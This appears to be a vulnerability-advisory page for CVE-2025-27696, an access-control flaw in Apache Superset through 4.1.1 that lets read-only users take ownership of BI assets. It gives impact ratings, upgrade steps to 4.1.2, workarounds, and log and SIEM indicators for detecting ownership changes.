CVE-2025-27696 – This vulnerability allows authenticated users w... (How to Fix)

Q: What is the severity of CVE-2025-27696?

CVE-2025-27696 has a CVSS score of 8.8 (HIGH). This vulnerability allows authenticated users with read-only permissions in Apache Superset to take ownership of dashboards, charts, or datasets. This affects all Apache Superset deployments through version 4.1.1. Attackers can modify or delete critical business intelligence assets they should only be able to view.

📋 TL;DR

This vulnerability allows authenticated users with read-only permissions in Apache Superset to take ownership of dashboards, charts, or datasets. This affects all Apache Superset deployments through version 4.1.1. Attackers can modify or delete critical business intelligence assets they should only be able to view.

💻 Affected Systems

Products:

Apache Superset

Versions: through 4.1.1

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: All deployments with authenticated users are vulnerable regardless of configuration.

📦 What is this software?

Superset by Apache

View all CVEs affecting Superset →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Malicious insider or compromised account with read access could take over all dashboards, charts, and datasets, then delete or modify them to disrupt business operations, inject malicious content, or exfiltrate sensitive data.

🟠

Likely Case

Privilege escalation where users with limited permissions gain unauthorized write/delete capabilities on BI assets, potentially causing data integrity issues or service disruption.

🟢

If Mitigated

With proper access controls and monitoring, impact is limited to unauthorized modifications of specific assets that can be detected and rolled back.

🌐 Internet-Facing: HIGH

🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Requires authenticated user with any permissions. Exploitation is straightforward once authenticated.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.1.2 or above

Vendor Advisory: https://lists.apache.org/thread/k2od03bxnxs6vcp80sr03ywcxl194413

Restart Required: Yes

Instructions:

1. Backup your Superset database and configuration. 2. Stop the Superset service. 3. Upgrade to version 4.1.2 or later using pip: 'pip install --upgrade apache-superset==4.1.2'. 4. Run database migrations: 'superset db upgrade'. 5. Restart the Superset service.

🔧 Temporary Workarounds

Restrict user permissions

all

Temporarily reduce all user permissions to absolute minimum required for their role while planning upgrade.

🧯 If You Can't Patch

Implement strict network segmentation to isolate Superset instances from untrusted networks
Enable detailed audit logging for all dashboard/chart/dataset ownership changes and review logs daily

🔍 How to Verify

Check if Vulnerable:

Check Superset version: if version is 4.1.1 or earlier, system is vulnerable.

Check Version:

superset version

Verify Fix Applied:

Verify version is 4.1.2 or later and test that read-only users cannot change ownership of assets.

📡 Detection & Monitoring

Log Indicators:

Unexpected ownership changes of dashboards, charts, or datasets
Users with read permissions performing write operations

Network Indicators:

Unusual API calls to ownership modification endpoints from low-privilege accounts

SIEM Query:

source="superset" AND (event="change_ownership" OR event="update_permissions") AND user_role="read_only"

📊 Metadata

CVE ID: CVE-2025-27696

CVSS v3 Score: 8.8 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-863

EPSS Score: 0.03% exploit probability (8.1th percentile)

Published: May 13, 2025

Last Updated: September 29, 2025

🔗 References

https://lists.apache.org/thread/k2od03bxnxs6vcp80sr03ywcxl194413 Mailing List,Vendor Advisory
http://www.openwall.com/lists/oss-security/2025/05/12/3 Mailing List,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-27696, you might also want to check these: